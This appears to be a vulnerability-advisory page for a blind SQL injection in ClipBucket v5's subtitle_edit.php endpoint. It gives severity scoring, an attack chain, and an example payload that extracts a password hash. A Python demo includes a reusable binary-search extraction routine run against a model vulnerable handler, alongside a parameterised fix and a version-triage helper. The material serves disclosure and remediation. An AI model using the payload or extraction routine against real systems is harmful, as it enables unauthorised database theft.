
ClipBucket v5 CVE-2026-45418

HIGH 8.8 (CVSS 3.1) · SQL Injection (CWE-89)
2026-06-11 · Vendor: GitHub_M

Severity by source

Vendor (GitHub_M), primary: 8.8 HIGH
  AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vuln.today AI: 8.8 HIGH
  Network-reachable PHP endpoint (AV:N), straightforward blind SQLi (AC:L), requires an uploader account (PR:L), no victim interaction (UI:N), and full database read/write gives C:H/I:H/A:H.
  CVSS 3.1: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS Vector (Vendor: GitHub_M)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

1. Analysis Generated: Jun 11, 2026 - 23:15 (vuln.today)

Description (CVE.org)

ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #132, any authenticated user who can upload videos can add multiple subtitles from different files and change their title (English, Spanish...). The POST /actions/subtitle_edit.php request used to change their title includes a number parameter which is vulnerable to SQL Injection. A boolean-based blind SQL injection can be used to exfiltrate sensitive data. This issue has been patched in version 5.5.3 - #132.

Analysis (AI)

Authenticated SQL injection in ClipBucket v5 prior to release 5.5.3 - #132 allows any user with video-upload privileges to exfiltrate database contents via the POST /actions/subtitle_edit.php endpoint. The 'number' parameter of that request is used unsafely in a database query, giving a boolean-based blind SQL injection. No public exploit was identified at the time of analysis; the GitHub Security Advisory (GHSA-q233-m544-6jqr) documents the issue in detail.


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Register or obtain an uploader account
Delivery: Upload a video and attach a subtitle
Exploit: Send a crafted POST to /actions/subtitle_edit.php with a malicious number parameter
Execution: Trigger the boolean-blind SQL injection
Persist: Iteratively exfiltrate database rows
Impact: Escalate using recovered credentials or tokens

Vulnerability Assessment (AI)

Exploitation: The attacker must hold an authenticated ClipBucket v5 account with permission to upload videos and attach subtitle files (the feature that gates the vulnerable endpoint); the target instance must be running a ClipBucket v5 release older than 5.5.3 - #132 and expose /actions/subtitle_edit.php to that authenticated user. …
Risk Assessment: The CVSS 3.1 vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H scores 8.8 (High) and reflects a network-reachable, low-complexity injection requiring only low privileges: any account permitted to upload videos. …
Exploit Scenario: An attacker registers or compromises a low-privilege account that can upload videos, uploads a video with a subtitle file, then issues a crafted POST to /actions/subtitle_edit.php in which the 'number' parameter carries a boolean condition (for example AND SUBSTRING((SELECT password FROM users WHERE id=1),1,1)='a', with the table and column names illustrative); differences in the response allow character-by-character extraction of password hashes, session tokens or other sensitive table contents. No public exploit was identified at the time of analysis, but a boolean blind primitive of this kind is straightforward to automate with tools such as sqlmap.
Remediation: Upgrade ClipBucket v5 to release 5.5.3 - #132 or later, per advisory GHSA-q233-m544-6jqr (https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-q233-m544-6jqr). …
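The boolean-blind primitive and its fix, modelled as an added example (this is not ClipBucket's code and is not taken from the advisory). Only the endpoint, the 'number' parameter and the injection class come from the advisory; the table and column names, the UPDATE query shape, the in-memory SQLite stand-in for the platform's MySQL backend, and the sample data are assumptions made for the demonstration:

```python
"""Added example (not ClipBucket's code): a model of the boolean-based blind
SQL injection class described for POST /actions/subtitle_edit.php, with the
vulnerable handler beside a hardened one.

Assumptions (not from the advisory): the table and column names (subtitles,
users, password), the UPDATE query shape, and the use of an in-memory SQLite
database instead of MySQL.
"""
import sqlite3

# Constructed sample data; the hash value is made up for the demonstration.
SECRET_HASH = "$2y$10$c0nstructedExample"


def build_db():
    """Create a throwaway database with one user and two subtitle tracks."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET_HASH,))
    conn.execute("CREATE TABLE subtitles (videoid INTEGER, number INTEGER, title TEXT)")
    conn.execute("INSERT INTO subtitles VALUES (7, 1, 'English'), (7, 2, 'Spanish')")
    conn.commit()
    return conn


def subtitle_edit_vulnerable(conn, videoid, number, title):
    """Hypothetical vulnerable handler: `number` is pasted into the SQL text.

    Returns True when a row was updated, False otherwise. In the real
    application the attacker reads the same bit from a difference in the
    HTTP response, which is all a boolean-based blind injection needs.
    """
    sql = (f"UPDATE subtitles SET title = '{title}' "
           f"WHERE videoid = {int(videoid)} AND number = {number}")
    cur = conn.execute(sql)  # attacker-controlled SQL is executed here
    conn.commit()
    return cur.rowcount > 0


def subtitle_edit_fixed(conn, videoid, number, title):
    """Hardened handler: reject non-integer input, then bind every value."""
    try:
        number = int(number)
    except (TypeError, ValueError):
        return False  # the real endpoint would answer HTTP 400 here
    cur = conn.execute(
        "UPDATE subtitles SET title = ? WHERE videoid = ? AND number = ?",
        (title, int(videoid), number),
    )
    conn.commit()
    return cur.rowcount > 0


def extract_string(oracle, subquery, max_len=64):
    """Recover the (ASCII) result of `subquery` one character at a time.

    `oracle(payload)` must return True when the injected condition holds.
    Each character is found by binary search over its code point, so one
    character costs about seven requests. Past the end of the string substr()
    yields '' and unicode('') is NULL, every comparison is false, the search
    converges to 0 and the loop ends. (SQLite's unicode() plays the role of
    MySQL's ASCII()/ORD().)
    """
    recovered = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = f"1 AND unicode(substr(({subquery}),{pos},1)) > {mid}"
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        recovered.append(chr(lo))
    return "".join(recovered)


def demo():
    """Run the extraction against the vulnerable handler, then the fixed one."""
    conn = build_db()
    target = "SELECT password FROM users WHERE userid = 1"
    vuln_oracle = lambda p: subtitle_edit_vulnerable(conn, 7, p, "English")
    leaked = extract_string(vuln_oracle, target)
    fixed_oracle = lambda p: subtitle_edit_fixed(conn, 7, p, "English")
    blocked = extract_string(fixed_oracle, target)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable handler leaked:", leaked)
    print("fixed handler leaked:", repr(blocked))
```

Run as a script it shows the vulnerable handler leaking the whole constructed hash while the fixed handler leaks nothing. Both halves of subtitle_edit_fixed matter: the int() check turns every payload into a rejected request, and the bound parameters mean a value that survives validation is still never parsed as SQL.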

Recommended Action (AI)

Within 24 hours: inventory all ClipBucket v5 instances and confirm which run a release older than 5.5.3 - #132; until they are upgraded, restrict the video-upload role to trusted accounts only, since that role gates the vulnerable endpoint. …
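A triage helper for the inventory step, added here as an example (not from the advisory or the ClipBucket project). It compares release strings in ClipBucket v5's "5.5.3 - #132" form (version plus build number) against the patched release; how the strings are collected from each instance is assumed to be done by the reader, and the host names are constructed sample data:

```python
"""Added example (not from the advisory or ClipBucket): classify ClipBucket v5
release strings against the first fixed release, 5.5.3 - #132.

Assumptions: release strings are supplied by the reader (for example copied
from each instance's admin panel); the hosts below are made up.
"""
import re

PATCHED_RELEASE = "5.5.3 - #132"  # first fixed release, per the advisory

# "5.5.3 - #132" -> major, minor, patch, build; the build number is optional
# because a deployment may only report "5.5.3".
_RELEASE_RE = re.compile(r"^\s*v?(\d+)\.(\d+)\.(\d+)(?:\s*-\s*#(\d+))?\s*$")


def parse_release(text):
    """Return (major, minor, patch, build) or raise ValueError.

    `build` is None when the string carries no build number.
    """
    m = _RELEASE_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised ClipBucket release string: {text!r}")
    major, minor, patch, build = m.groups()
    return (int(major), int(minor), int(patch),
            int(build) if build is not None else None)


def classify(text):
    """Classify one release string as 'affected', 'patched' or 'unknown'.

    'unknown' covers an unparsable string, a non-v5 major version (the
    advisory only covers ClipBucket v5), and the ambiguous case of "5.5.3"
    with no build number: builds of 5.5.3 before #132 are still vulnerable,
    so a bare 5.5.3 must be checked by hand rather than marked safe.
    """
    try:
        major, minor, patch, build = parse_release(text)
    except ValueError:
        return "unknown"
    if major != 5:
        return "unknown"
    p_major, p_minor, p_patch, p_build = parse_release(PATCHED_RELEASE)
    if (major, minor, patch) < (p_major, p_minor, p_patch):
        return "affected"
    if (major, minor, patch) > (p_major, p_minor, p_patch):
        return "patched"
    # Same x.y.z as the fix: the build number decides.
    if build is None:
        return "unknown"
    return "patched" if build >= p_build else "affected"


def triage(inventory):
    """Map {host: release string} to {host: classification}."""
    return {host: classify(release) for host, release in inventory.items()}


# Constructed sample inventory; none of these hosts are real.
SAMPLE_INVENTORY = {
    "video-eu1.example.internal": "5.5.3 - #131",
    "video-eu2.example.internal": "5.5.3 - #132",
    "video-us1.example.internal": "5.5.2 - #140",
    "video-us2.example.internal": "5.5.3",
    "video-dev.example.internal": "5.6.0 - #3",
    "video-old.example.internal": "4.2.0",
}

if __name__ == "__main__":
    for host, verdict in sorted(triage(SAMPLE_INVENTORY).items()):
        print(f"{verdict:9s} {host}")
```

The point of the 'unknown' bucket is that "5.5.3" on its own is not evidence of being patched: the fix is a specific build of 5.5.3, so anything that cannot show a build number of #132 or higher stays on the follow-up list.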
